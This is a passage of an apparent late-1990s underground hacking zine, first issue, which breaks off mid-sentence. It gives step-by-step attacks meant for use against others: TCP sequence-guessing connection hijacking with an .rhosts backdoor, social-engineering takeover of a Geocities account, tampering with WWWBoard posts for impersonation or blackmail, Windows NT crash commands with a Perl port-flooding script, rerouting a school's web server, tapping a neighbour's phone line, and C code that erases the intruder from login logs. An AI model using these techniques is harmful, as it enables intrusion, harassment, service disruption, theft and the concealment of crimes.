::::::::::::::::::::::::::::::::00000:::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::000000000:::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::0000111110000:::::::::::::::::::::::::::: :::::::::::::::::::::::::::000001111100000::::::::::::::::::::::::::: ::::::Issue #1 Volume #1::00000011111000000:::Issue #1 Volume #1::::: 000000000000000000000000000000001111100000000000000000000000000000000 < The premiere underground exploration zine. > 000000000000000000000000000000001111100000000000000000000000000000000 ::::::Issue #1 Volume #1::00000011111000000:::Issue #1 Volume #1::::: ::::::::::::::::::::::::::00000011111000000:::::::::::::::::::::::::: :::::::::::::::::::::::::::000001111100000::::::::::::::::::::::::::: ::::::::::::::::::::::::::::0000111110000:::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::000000000:::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::::00000:::::::::::::::::::::::::::::::: Good guys announce the security weakness, the bad guys keep it to themselves ----------------------=============================------------------------- ----------------------===>Web site of the month<===------------------------- ----------------------==>http://www.silitoad.org<==------------------------- ----------------------=============================------------------------- %%%%%%%%%%%%%%%%%%%%%%%%%%%%% This Months Table of Contents %%%%%%%%%%%%%%%%%%%%%%%%%%%%% 1.Introduction *Biography - KciN *Editorial - Merde Fuk *Members - KciN 2.Hacking *Connection Hijacking Attack - Merde Fuk *The Basics *Three way Handshakes *.rhosts and trusted servers *SYN Flooding *Sequence Numbers? *The Attack *Short Explanation *Finding a target *Finding a targets Trusted Host *SYN Flood trusted host *Sample the sequence numbers *Spoof the trusted host *The heart of the Attack *Once inside.. *Concluding paragraph. *Defacing Geocities - Krawl *WWWBoard Hacking - KciN *Windows NT exp0sed (Part I) - Merde Fuk *Introduction *Attacks and Hacks *Local Attacks *FileManager Hole *Ntfsdos Hole *Denial of Service *Ping of Death *IIS Attack *Telnet Attack *Novell Ip Re Routing Attack - KciN *Getting away Scott free - Merde Fuk 3. Phreaking *Pitting - Lord Duke *Modified SNI phreaking 4. Anarchy *How to kill someone - PentiumRu 5. Music *KoRn live in KC - ViolentJ %%%%%%%%%%%%%%%%%%%%%%%%%%%%% stnetnoC fo elbaT shtnoM sihT %%%%%%%%%%%%%%%%%%%%%%%%%%%%% $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$$$$$$ Introduction $$$$$$$$$--------------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Hello fellow readers, welcome to issue 1 of the new 0 online zine along with this issue you will find only limited information on what is already stated in many texts that are found around the world, it would be great if we could stuff all of our knowledge into one huge issue, but its this thing called a mental block, we don't really have the patience to do such a thing, so were just going to bring it to you in blocks at a time, and whenever we feel like doing it. ;) $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$$$$$$ Bio-graphy $$$$$$$$$--------------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ There's not really much to say about us at the moment, but since this IS our first issue, I feel as if I should provide you with at least a little information about the people who write for this zine, but it wont be much and if you want more, I guess you'll just have to dig it up yourself ;) Don't know why we started, don't know if it will ever end, but its here now, and for atleast right now, its here to stay (Tongue twister there). We are here to provide YOU information at an easy level of understanding, if you are confused by most texts out there that use big words such as subnetmasking then this is the zine for you. All the texts are technical yet, easy to understand. You don't have to be a hacking veteran to understand what we are trying to explain. In the case words that arnt usually used in everyday speech those words will be explained in order for the reader to understand. No were not trying to be like the Happy Hacker shit, in fact we hate the happy hacker articles, they are useless to everyone, with topics such as "Fingering servers" Oh no! Not fingering! And another thing about the happy hacker digest is, its run by a total moron who wants to explain LEGAL things! That's stupid...I mean that's really retarded. No were not trying to be like 2600, they are old news, with every issue of their magazine is an article on redboxing..My question is why? 2600 believes in "Freedom Of Information" but it makes me wonder, why is their magazine $5.99 a pop? This zine is free, and always will be free. It is done by people whom in their spare time decided to provide you the reader information that is actually useful.. Well I have canned the goods in 5 short paragraphs..Thats what we are about, and what we do. If you don't like it, then I pretty much say you should not read on.. Later Folks KciN $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$ Editorial $$----------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Alright this is our first issue, and Im damn proud of it, it has some solid to the point but detailed explanations on security and that sort of thing. This issue has taken about a month and a half to compile and well thanks to 'The Banshee' we even have a place to host our little 'zine' at www.sinnerz.com/banshee/0 We came in contact for several reasons, for one he lives really near me (Merde Fuk) and for another cuz he really digs what we are doing. No were not competing with any other 'groups' in fact we dont even consider ourselves a group, but just a gang of people learning by doing and learning by teaching. In this issue we do get into some complex subjects but they are well explained to the point that you can understand them. The reason we dont have many articles on 'phreaking' or anarchy is based on the fact that none of the members really know much about phreaking but the bare minimum. But we did get some guest speakers to write some articles on phreaking, along with a very well known phreaker 'Lord Duke' who once called me up while pitting, so you know he knows whats up. We were going to have some articles from A dude named Modify with a review of firewalls that are currently on the market, but it never really edged out, same with a smart kid named Darkling but he had to go away to some kind of camp or somthing and he couldnt be bothered with such. So here it is, I really hope you guys enjoy this as much as we enjoyed compiling it all for you. So Ill see you guys in the next issue.. Merde Fuk $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$ Members $$----------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Here is the current member list, this can change at any time, cuz like were cool like that, so far all the members live very close to eachother and spend almost all day with eachother. KciN - Editor and writer d00d Merde Fuk - Techy of the gr00p Banshee - WebSpace Guy Heh well thats about it for now, all the rest are just guest writers who were eitehr asked or volunteered to write some articles... &&&&&&&&&&&&&&&&&&&&&&&&& H a c k i n g &&&&&&&&&&&&&&&&&&&&&&&&& $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$ Connection Hijacking Attack! $$----------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ God This is going to take a while! This article includes all the goodies, and in complete detail tells how to literally hack a server, using IP Spoofing, one of the most mis understood terms in the underground. Stupid fuckers have been using IP spoofing to go on irc and brag to their friends that they are k-rad. This is not why ip spoofing came around, in this text I will explain to you, in easy to understand language, that ip spoofing is just a step into the process of gaining access to a server you are not supposed to have access to. The Basics ---------- In order to further understand what I am about to explain you must have a general knowledge of several things that I will explain in the following paragraphs...So no need to start to pout yet ;) Three way Handshakes -------------------- In order to start an actual data transfer of any kind on a network you must have what you call a "three way handshake" it goes much like this. You send what is called a SYN packet to a host, the SYN Packet has headers which in turn tell the host that you want to connect to him, the host send you back an ACK command, which tells you that its alive, and open for connections, then you again send out an ACK Command to the host telling it that your still alive, and the data transfer can begin. If that's a little confusing, I agree, its confusing in words, but let me make a small diagram on what a three way handshake looks like : YOU --SYN-----> HOST (You send out a SYN Packet to the host, telling it you want to connect) YOU <--ACK----- HOST (Host responds with an ACK or acknowledgment that it is alive and open) YOU -----ACK--> HOST (You respond back and the data transfer can now begin..) Every time you do a regular data transfer on the internet such as bring up a webpage this three way handshake commences. So now you know how data gets from that machine to yours, this little information is the basis of this attack. .rhosts and trusted servers --------------------------- Aright lets say you have in internet account, with a local Internet service provider (ISP), AND you have an account with another server, which gives you a shell account. A shell account is basically an account on the servers UNIX operating system. They give you a home directory in which you have access to the text editors such as Joe, and Pico, and you can also work on c programs using the gcc compiler. O.K. now lets say you want to save some time, so you want to make the process of logging in to the shell account shorter, or maybe eliminate it completely. Well due to the trust that a UNIX operating system has with its users, this can be done, the process of entering a password at the login screen can be illiminated. This can be done with a file called .rhosts, which will grant or deny access based off the IP address of the person trying to logon to the shell account its self. The server that is in the .rhosts file is called the trusted server for the fact that when it sees that IP address it trusts them. It thinks that they are the person that is supposed, and allowed to be there. UNIX will trust ANYONE with the specified ip address in the .rhosts file. SYN Flooding ------------ A port on most UNIX operating systems can only handle a certain number of connections to one port at a time, this is called the "backlog". If the backlog is filled up all incoming SYN connections will be ignored. Leaving them not allowed to connect to the server until the other connecting requests are dealt with properly. But if the SYN headers are spoofed when sent to the host the host will keep on trying to successfully find the person who sent the original syn message to it, and wont let anyone connect until it is done. Here's the step of a SYN Flood 1) Person uses ip spoofer to spoof his original ip address and sends out a several SYN packet to a specified port at a host. 2) The host's port gets flooded with SYN's and try's to reply to the SYN command but cant because the person who sent the original SYN is not a real host, leaving the ports closed, so no other connections can be made into that host. YOU (Spoofed IP) --SYN-----> HOST | YOU (Spoofed IP) --SYN-----> HOST | YOU (Spoofed IP) --SYN-----> HOST | YOU (Spoofed IP) --SYN-----> HOST | From here on all other connections YOU (Spoofed IP) --SYN-----> HOST | Will be ignored because all the YOU (Spoofed IP) --SYN-----> HOST | connections are taken YOU (Spoofed IP) --SYN-----> HOST | X (Not really real) <--ACK-- HOST| So in turn the HOST cannot find YOU (With the spoofed IP) so the port is left flooded because the host will not drop the connections until they are fur filled. After a bit the server will crash.. This is called a "Denial of service attack" For the fact that it denies anyone else service to that host you can read more about denial of service in this newsletter. Sequence Numbers? ----------------- Sequence Numbers are a prime factor in this attack, but also kinda hard to explain. I only have a general knowledge of sequence numbers, but a general knowledge is a hell of alot better then no knowledge ;) Every byte that you transfer from one computer to another on a Internet network it is assigned a sequence number. Sequence Numbers are assigned to make sure that the connection that is made doesn't become corrupt. Lets say we didn't have sequence numbers, then maybe by accident we got a repeat of a byte, that would corrupt our data right there. IN a three way handshake, the first sent SYN packet contains what is called the Initial Sequence number, that sequence number tells the host what the next sequence number is. (Confused yet) This will all come together when I explain the attack at itself, its all got to do with timing and round trip time. Round trip time is how long it takes your SYN packet to reach the host and the host to send back its ACK (acknowledgment) lets say you had to do this all by hand, you send out the SYN command, and the host sends back the ACK command, you have to calculate the exact sequence numbers timing in order to send the ACK back to the host to start the data transfer. -If the sequence number you send is a smaller number then what the server expects it will just throw that try off, because it thinks its an old packet that never reached or has failed before -If the sequence number is exactly what the host expected, it will let the ACK come through and the data transfer can begin. -If the sequence number you send is greater then what the host expects it will hold that sequence number, because it think that it is a future bit, and it will hold it until the other bits come through first.. Trust me this may all sound stupid now when I'm explaining it, but it all does come together when I start explaining the attack, you need to be able to spoof the ACK command that goes to the host when doing the 3 way handshake Oh and each time a connection is made to the host that you are making the connection to the sequence numbers goes up 64,000. The Incicial sequence number goes up 128,000 every one second, and wraps every 9.32 hours. This counting process will be needed later on in the attack.. The Attack ---------- I really cant express enough how much you need to understand the above features before going and trying to execute this attack, just for the fact that you will not be successful in your attempt, it took me 3 good days of reading to readily understand sequence numbers, and I suggest you also read all you can on sequence numbers, do searches, read internet protocol articles just make sure you understand what you are doing before you get your hopes up to find out that you didn't calculate the Round trip time right and you end up with a smaller sequence number then originally intended. Its a bummer and a waste of time if you don't understand it. Short Explanation ----------------- 1)Choose the target 2)Find trusted host 3)SYN Flood trusted host 4)Spoof the trusted host 5)Guess the sequence numbers for the outgoing ACK 6)Make the connection 7)Leave a backdoor in the .rhosts file Finding a Target ---------------- This should be fairly easy based on the fact that if your the kind of person who has a personal vendetta with a server or you just want to try this out on. Or you can get special permission from 2 hosts that will allow you to do this as a security measure, that is probably the best way to go to avoid any sorts of criminal prosecutions. I urge you to not in any way incriminate yourself, this text is for security reasons only to inform, and protect. This attack is NOT new, I did not make up this attack, I'm only explaining it, and how to prevent it. So don't come crying to me when you get raided and you have no where else to go. Stay safe and be paranoid. Finding a targets Trusted Host ------------------------------ Once you have your target, you want to find out if it has a trusted host, since you cant go into their computer and look to see if they even have an .rhosts file you have to do the checking out yourself. If the target host does not have a trusted host, this whole text is very pointless, but from here on in, I am talking as if the target host does in fact have a trusted host. This is where you use your talent of social engineering. Finding the trusted host is hard, Ill admit that, but if your going to go this far you might as well find out about the system your going to hack, know what your doing, know the system before you go in. Here is a list of possible ways to maybe gain information about trusted hosts. showmout -e target ->SHows where the file systems are exported finger -l @target finger -l @trustedserver.com finger -l root@trustedserver.com rpcinfo -p x-terminal These are a couple of ways off the top of my head, but you can always find shit out, Basically use your head in this matter, because well, this isn't the hardest part of the attack, it may seem that way now, but it only gets harder from here on out. Talk to a representative of the company, I dunno read up on social engineering... Over all this attack all comes down to trusted hosts, which are inserted into the .rhosts file itself, this is why I spent a some time explaining .rhosts files, because if you can become the trusted host you also have access to the target host. Is this getting better by the minute or what? SYN Flood trusted host ---------------------- In order for this whole thing to go through the trusted host must be taken out with a SYN flood (SYN Flood was discussed earlier in this article) for the fact in later parts of this attack you need to spoof as the trusted host then send out a SYN command to the target host's port to try to connect to it, and if the host your attacking can send a message back to the trusted host, it would get an error saying that host did not send out a SYN packet for an opening connection, so in turn to make sure that does not happen. You must flood the ports of the trusted host so no other connections can be made. *NOTE* This is because you are flooding ports on the trusted host and when the port in the trusted host is still looking for someone to send back an ACK (It is still gagged by the SYN flood) command to it doesn't let any other connections come through. So you can successfully guess their sequence numbers that you guess (IN time) that the trusted host would send to the target host. SYN flooding software is readily available at many "Underground" sites and I wont go into posting the code here for the fact I'm just wasting space when you can do a search on the internet yourself and find it. For example a very good spoofer/SYN flooder can be found at http://main.succeed.net/~coder. But this NEEDS to be done, you don't need any interruption's in this attack. Sample the sequence numbers --------------------------- Because you are not the real host you are mearly a spoofed version of the trusted host, you also have to spoof the return sequence number. Remember in the three hand shake there is first a SYN from you, that tells the host that you want a connection to its server, then the host sends back an ACK or acknowledgment. So if you spoof the trusted server and send out a SYN packet, the server you just sent the SYN packet to will try to reply back. If you don't guess the right sequence numbers (OR the timing of the transfer) it wont let you log in. See if the REAL trusted host was available (Not under a SYN flood) the real trusted host would have given the other host an error. But with the SYN flood gumming up the works, and not allowing any other connections, you can successfully spoof back the ACK back to the host so you can connect. Before you do the initial attack connect to one of the major ports on the server your going to attack, like port 25 (The sendmail port) and sample its sequence numbers. You need to calculate how long it takes for Your SYN reaches the server and an SYN/ACK is sent back to you, then the ACK you send back to the host, all in one. Do this many times until you have enough you feel is a good diagram to round up and become a one figure. Remember sequence numbers go up 128,000 a second, and 64,000 per connect. -If the sequence number you send is a smaller number then what the server expects it will just throw that try off, because it thinks its an old packet that never reached or has failed before -If the sequence number is exactly what the host expected, it will let the ACK come through and the data transfer can begin. -If the sequence number you send is greater then what the host expects it will hold that sequence number, because it think that it is a future bit, and it will hold it until the other bits come through first.. Spoof the trusted host ---------------------- This is easy there are many ip spoofer software for linux and the unix flavors, just pick one of these up and compile it. *NOTE* You must have root on the linux operating system you are doing the attack from for the fact that if you just have a regular home directory you cannot open up raw connections in which are needed for a general spoof. So load it up and spoof the address of the TRUSTED host, and go right on to the next part. The heart of the attack ----------------------- This is the main part of the attack, once you are spoofed as the trusted host, you should send a connection request to port 513 (The login port) Then the host will then send back a SYN/ACK to the trusted host, which is under the gagging of the SYN Flood so it wont accept anymore connections hence it wont get an error back. While this is all going on we have to wait for a bit for the SYN/ACK to be sent to the host. Now you must send an ACK back to the host you are attacking with your guessed Sequence number attached (Plus one because we are sending for a login) If your guess is correct it will then accept your connection. Type the magical word root and since that .rhosts file is there, and you are spoofed as the trusted host, you will get automatic access to the system. Isn't unix great? Trust is a great thing to encounter in any type of linux operating system. Once inside.. ------------- Since you really don't need to edit or destroy any log files, you are home free, but as one last thing we do, we will put in a backdoor so we can access their system as we please (No more of this spoofin shit) so we do a cat + + >> ~/.rhosts . When you add a + + (as explained earlier) its basically saying any host is allowed without entering a password. The only problem with that alot of systems now adays are equipped with a program that looks for .rhosts files that have a + + file..But oh well fuck it, your in it just for the hack of it right? Conclusion paragraph -------------------- Basically this attack is very useful if you know what you are doing. This wasn't as 'in depth' as I would have liked to go, but well, I'm not the kind of person who can splash what's all in my head onto a piece of paper, its easier for me to consume information then give it away. But I tried my best and I hope you could understand it. Id like to give a couple shoutouts to the people who made this article happen. Phrack, Modify for teaching me the art of spell check, and the whole 0 cr3w. Remember before asking a question, always try to answer it yourself first. Phe3r m3, Merde Fuk $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$$ Defacing Geocities $$$----------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Okay, here we go... First things first, find your target, your enemy. Find out his/her first name, last name, birthrate and such. Maybe check an autobiography that's on their site or just ask them through email or a chat thing, like IRC or say Powwow - act casual, don't go on saying "Yo, bitch, whats yo sign" - act like their "friend", hell, they don't have to know it was you! Next, when you know your enemy... go here: www.geocities.com/help/pass_form.html Yes this is the page where you are able to hack the account, and if you know your enemy it just takes a minute. So, you fill out the shit. then theres a form that says E-mail Address in Profile (Even if it is invalid or no longer working) fill it in.. then below it it should have another form saying, New/Correct E-Mail Address (Address Password will be sent to) fill it in..(your address, so you may receive verification) Submit. Now it is sent via CGI to a real Geocities employee, and they will write you back..personnally..so expect a delay of getting written back to, it will take 1-3 days or so depending on how busy they are of course. But hey guess what boi'z and grrl'z! THEY DONT GIVE A FUCK, trust me. So, you check your mail..hey this is cool, its got their password! Now what you do is go here: www.geocities.com/homestead/file_manager.html. Log on as the user, and the use password that you have received thru mail. Hah, now your in THEIR directory..first things first, change their profile.. you know, change their names, birthdate and password of course! Make sure you change either their name(first or last) or birthdate so they can not receive varification because they're information will be wrong. So they'll be like...WTF??!?!? Muahaha now change the site however you want! This is where YOUR creativity comes in, don't forget to leave your signature. Del, Edit, Leech, whatever. Now wasnt that fun? note: You must have all the information to submit it. If any of the information is wrong, you will get mail saying that something was wrong, and not get the password. Smart people can avoid getting broken into by not telling ANYONE who they/you are, or change your profile to something thats fake, change your birthdate, first/last name, and use passwords that only YOU would think of, must be 8 characters or less. No, changing the address wont boost your security. But remember there are other ways to HACK, probably BETTER ways to do it. Remember, nothing is secure or as secure as you think. Hell, some teenagers hacked the Pentagon. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$$ WWWboard Hacking $$$--------------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Yes everyone knows the silly ass ways of getting a password file off of a wwwboard that was made with matts wwwboard script. But Im here to say there are other ways to make life living hell on a wwwboard, and not just for matts script either. * Have you ever wanted to spoof your ip address when they have those IP catchers (Or domain name catchers)? This is the text for you * Have you ever wanted to change somoenes words around on a post so they are saying somthing completly different from what they really said? This is the text for you. * Have you ever wanted to just erase someones existance off the wwwboard without the use of the wwwadmin? This is the text for you. * Have you ever wanted to make the wwwboard index.htm page say what you think it should say? This is the text for you. These are just a few things you can do with the technique Im about to describe. I have to admit though, its not really hacking, its more of a game with permissions. As you might or might not know, permissions tell the unix operating system who can read, write, access files, delete, and change files. For example, the user 'root' on a unix box, can do anything he wants. But if your just a regular everyday user on a unix box you get a home account, and file permissions look like this in your directory *Directory drwxr-xr-x (World readable but owner can do what he wants) *file.txt -rw-r--r-- (WOrld readable but owner can do what he wants) ^File ^File permissions Now its true that if you run a wwwboard your directory for the wwwboard is set for a norman directory (drwxr-xr-x) like any other directory in your home account, but once you enter the acctual wwwboard directory we come up with the messages directory. As you can see it is set to chmod drwxrwxwx which means this directory is world writable, readable, deletable, updatable, everything that root has. That means, an everyday user can upload edit, and download whatever he pleases in that directory. Lets say you want to show off a little bit and want to make it so your domain name shows up as "fbi.gov" (if it has a ip catcher) this is easy as cake. First you make your message as you normaly would at any point in time on the wwwboard, find out what number your .html file became, in this case I will say the number is 666.html. So we go into the ftp site, and download 666.html into our own directory in our own computer. We go down to the part that has our domain name sitting there and replace it with 'fbi.gov'. But first we have to delete the 666.html file in the server before we can upload the new improved version. So delete it, and upload the new 666.html and well people will think your the fbi. ;) This is the basic thing you need to know on how to change around things on a wwwboard, and now its time to think of your own ideas (I gave you a few at the begging of this short little text) so go and play, and freak, piss, black mail people all you want, its great fun, and well its not really illigal, for its not hacking, its just playing with simple file permissions. Remember KciN loves you! KciN $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$$ Windows NT exp0sed I $$$--------------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Merde Fuk Introduction =====-------> This is going to be a 2 part series one being here and the next part will be written for the next issue of 0. So like read on and learn what I have posted here and then you will be ready for the next step. Well along with each operating system out there, comes the dark side of hacks, crackes, holes, and other tasty tidbits in which will be explained in complet detail. Youve read my connection hijacking article, now be prepared for the next step of e-z-hacking, courtosy of moi, Merde Fuk. Before I go into all this, I want to unravle some of the mystery about me, if you know me, you know Im a complete asshole. But what you dont know is, you know me very well if you know my alter persona 'Merde Fuk' Im not going to say in this issue who I really am, but mabye in a future issue of 0. Who knows I might not. NT has been famous much like unix, for having unlimeted security flaws, every day there is a new hole being discovered in this flavor of operating systems. My friend Banshee has found one of them (Which will be explained in this text) I would love to go into complete detail as I did with the connection hi-jacking text, but it might be pretty much impossible, so I will try (TRY DAMNIT!) to explain each attack in detail. So bare with me folks cuz here we go. Local Attacks ------------- These are the attacks in which are preformed at the computer its self not remotly meaning that these are attacks taht are done once you are inside or literally physicly at the computer. FileManager Hole ---------------- In MS Office 7.0 there lies a very interesting hole, MS Office comes with a shortcut bar, which holds ms write, and all that office stuff, this also holds a file manager type of program. Any old user can access that file manager, and any old user has control over any old file no matter what file permissions are opon it. Ntfsdos Hole ------------ Secure file systems on the nt operating system can be read by a normal user, or really the login can be bypassed and be read by a person with the Ntfsdos.exe as a bootup disk, when you boot up with the Ntfsdos.exe program all information that is saved on the hard disk can be read. NT Denial of service attacks ---------------------------- Ha, for some reason denial of service attacks are always called lame but why? Because the people who say they are lame, cannot do them, and whenever a person cant do somthing and the other person can they call the other person lame, kinda like the carolyn meniel crowd. Personally I think denial of service attacks are the most fun to execute, they may be considered lame, but wtf? Do whats fun not what other people tell you you should and should not do! If you dont know what denial of service attacks mean well heres a quick explaination, its when you suck up so much of a resource on a server (IE multiple connections to one port) you soon lag them and even sometimes force them to either re-boot or re-connect to the internet. Most denial of service attacks are used just for the basis of destruction. Even when doing a connection hijacking you are doing it to literally take down a server to allow no more connections to a server. Ping of Death ------------- One good thing about windows 95 and NT is that it gives you the power of sending large packet pings, up to 165527 bytes. Thats alot. When you send a large amout of ping data to a server it starts to lag then usually on NT machines and 95 boxes gets an error like STOP: 0X0000001E KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS A nice little blue screen that forces you to either reboot or reconnect. I do not suggest this attack unless you at least on a 36 connection, for the fact that if you start sending out large packets of pings you yourself will get lagged, its kinda boring too. But if your using windows hers the command in dos PING -l 65527 -s 1 victim.com PING = Ping -l means I have no idea 65527 = how many bytes you want in the packet -s 1 how many times to ping victim.com the person your wanting to "ping of death" ISS Attack (Not Denial of service) ---------- This is a rather funny little attack, it gives a popup on the server first crashing it then giving it a popup log error. To achive this little effect telnet to port 80 which is the http port and type GET ../.. and thats it, blah blah, what a peice of shit this nt is. Now you know why this article is called NT Exposed (as a peice of shit material for networking) Another Telnet Attack --------------------- Tisk tisk tisk. Have you noticed since the dawn of nt servers there are no more needs for a brain in that world that I like to call "hacking" No its true, you dont need a brain to pull off a server crash on a NT server. Well you need to know how to read and type, know the basics. But man, this is really pathetic. This is another telnet attack in which you will laugh your little balls off (OR ovaries not excluding anyone) 1)Telnet to an nt server on port 135 2)Type 10 charicters followed by a 3)Exit your telnet program 4)Watch the server go nuts 5)Server crashes cuz its a tardo system. Heres a simple perl code I ripped from some NT security page Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername /*begin poke code*/ use Socket; use FileHandle; require "chat2.pl"; $systemname = $ARGV[0] && shift; $verbose = 1; # tell me what you're hitting $knownports = 1; # don't hit known problem ports for ($port = $0; $port<65535; $port++) { if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) { next; } $fh = chat::open_port($systemname, $port); chat::print ($fh,"This is about ten characters or more"); if ($verbose) { print "Trying port: $port\n"; } chat::close($fh); } /*end poke code*/ So what have we learned kiddies? Dont take candy from bill gates. Look both ways before purchasing NT, and never ever underestamate the power of the GNU! Stay tuned phans for next months thrilling conclusion of NT Exp0sed!!!!#@!#@ When we will learn more denial of service attacks, and more remote, and local attacks, wont it be grand? so be prepared folks. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$ IP Re-Routing Attack $$--------------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ KciN Lets start here: This little hack was one of the reasons that let me to getting kicked out of my college(at least I think it is), so what Im saying is, its not cool, if you get over your head its not my fault, and you WILL get in trouble. ****THIS WILL ONLY WORK ON A WEBPAGE THAT IS RUN OFF A NOVELL NETWORK**** In dos Go to the networks main drive, the one that all the tcp configurations are run off of, for example mine was drive N:\ (N = network?). When you get there, there is a directory called "tcp", guess what that is! From there go into either of two options that I know of (only been on 2 large novel networks) it should be under in my cases tcp.cfg and some other thing I forgot. Then "edit tcp.cfg" and you should see a screen like this 204.33.333.22 dns 555.53.332.22 back 111.2.22.222 ftp 33.333.33.333 stmp Or somthing like that, I cant remember..Well there was one of the ip's that was routed as the schools homepage. Now go home, turn on your computer, and connect to your isp, oh and dont forget to note your ip address (this is where it gets slightly complex) go back to school now, do all as above, but change the homepages ip to your ip at home. Now your computer is the webpage server. Go home make the proper directorys, and do what you like, you know make it look better, and sit and wait for the feds...I did. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$ Getting away scott free $$--------------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Merde Fuk Everyday you see some dumbass wanna be hacker getting arrested, suspended from school, kicked out of the house, getting raided by the feds for the stupid ass reason that the dumb fucker doesnt know how to edit log files! In this text I am going to explain the varius log files, and where to find them and how to edit and replace them, using either your greatest hacking tool yet, that being pico, or use one of the log editor programs. In this day in age, people use the internet as good ways to access other computers. Good idea, but you are also more succeptible to log files. When you gain root on a dial up there are no log files to be dealt with. The only true worry is that someone will trace your number back to the original caller. but that is easily by passed by simply not doing it from your house. Here is a simple plan for using your neibors phone line to do your deeds (I am lucky for I have a kid next door who tells everyone hes a hacker so if I ever get caught its him who gets the blame). Ok here we go, on most rural or suburban neiborhood there are little gray boxes on the sides of the houses, which are locked by a simple screw that you can unscrew in a matter of seconds. This little gray box contains usually two phone lines that lead up into the house. If the person has two phone lines then the two jacks will be two different lines, if they have one phoneline then both jacks will be the same line. Ok, if the person has only one phone line you are good to go. (Make sure you do this at night or when your neigbors are away on vacation) Dig a small ditch from your neigbors gray box to your house's nearest window, then get some long phone cords (Usually found at radio shack) and run it from the gray box to your nearest phone in your house. Cover up the ditch and you got yourself a nice phone line to do what you like. But what if the house has two phonelines and you cant dissconnect one of thier lines just for you to use, you may ask. That is right thats just screamin for yourself to get caught, so heres what you do! Go to radio shack and pick up a splitter they kinda look like this || --- / \ |_____| I know thats a real lame depiction of the splitter itsself, but uhm what it does is you can split one line into two lines. So do the same as the one liner and dig a ditch etc etc, but put the splitter in and lead one line into your neibors house and the other to your house, so no suspision when they use their second phone line and the have no dial tone..Also I suggest you do all your callin on their phone line when they are not home, and dont try to listen in on their phone calls cuz each time you pick up the phone thers a really loud click that the other party can hear..Use it just for doing the stuff you wouldnt dare using your phone line to do. So when the cops start pullin up, you dont have to worry its all next door. Now on too unix, and linux. When you do anything on a linux server, you are logged. The three main log files you really should worry about are 'lastlog', 'UTMP', and 'WTMP' The only way to edit these files is if you have root cuz only root owns these files. Heres a breif description of the 3 important log files. LastLog - Where the last login came from. WTMP - every log on and off, with login and logout time plus tty and host. UTMP - Who is currently logged in on the server. Heres where they can be found on vairus operating sytems. Usually in linux you can find all the log files in /usr/var/adm LastLog UTMP WTMP | If one of them is in one of those ------- ------ ------ | directorys, all the rest tend to be in /usr/var/adm /etc /etc | the same direcorys. And dont forget /usr/adm /var/adm /var/adm | if you used the famed phf exploit /var/adm /usr/var /usr/var | to get your password file that you /var/log /usr/adm /usr/adm | cracked, dont forget to erase everything /var/log /var/log | in the /httpd/logs file, in which a lot | of hackers neglect to do! Things not to do ---------------- Never, ever, ever, ever totally delete the log files for the fact that root then knows that there was a hacker in the mists of his system. Dont go into /etc/motd and change the motd. Thats the first thing most lame fuckers do, and thats just another way of screaming 'A HACKER WAS HERE!' (Why is it when someone acctually gets into a system they feel compled to tell someone that they were there?) Dont put in suid root shells anywhere, your better off compiling a backdoor so you can access it anytime without being noticed by commands like user or finger.. Dont hack the webpage the server is using, unless you have a pretty damn good reason to do it and not just to show off to your friends and to try to be cool Some codes to help you along the way ------------------------------------ Marry.c is a great program for editing log files. Lots of flags to play with and over all its a great fucking program to use to edit and spoof logs. You can get the source redily at most sites that offer "hacking" codes. Im sure alot of people can back me up in saying this is one of the best. (http://www.rootshell.com is one of the places you can get it) This next program basicly just erases yourself from all the logs, its simple but it also screams to the sysadmin that there was a hacker present in the machine #include #include #include #include #include main(argc, argv) int argc; char *argv[]; { char *name; struct utmp u; struct lastlog l; int fd; int i = 0; int done = 0; int size; if (argc != 1) { if (argc >= 1 && strcmp(argv[1], "cloakme") == 0) { printf("You are now cloaked\n"); goto start; } else { printf("close successful\n"); exit(0); } } else { printf("usage: close [file to close]\n"); exit(1); } start: name = (char *)(ttyname(0)+5); size = sizeof(struct utmp); fd = open("/etc/utmp", O_RDWR); if (fd < 0) perror("/etc/utmp"); else { while ((read(fd, &u, size) == size) && !done) { if (!strcmp(u.ut_line, name)) { done = 1; memset(&u, 0, size); lseek(fd, -1*size, SEEK_CUR); write(fd, &u, size); close(fd); } } } size = sizeof(struct lastlog); fd = open("/var/adm/lastlog", O_RDWR); if (fd < 0) perror("/var/adm/lastlog"); else { lseek(fd, size*getuid(), SEEK_SET); read(fd, &l, size); l.ll_time = 0; strncpy(l.ll_line, "ttyq2 ", 5); gethostname(l.ll_host, 16); lseek(fd, size*getuid(), SEEK_SET); close(fd); } } Now as a concluding paragraph Ive decided to show you why you should be paranoid as shit. The first and only time I was busted wasnt because I neglected to erase log files, or I told eveyone about my doings, it was because there was a large suspision that I was an alleged "hacker". So because of this I was not only kicked out of college, I also found out that I was being watched for 3 weeks including undercover bitches posing as my 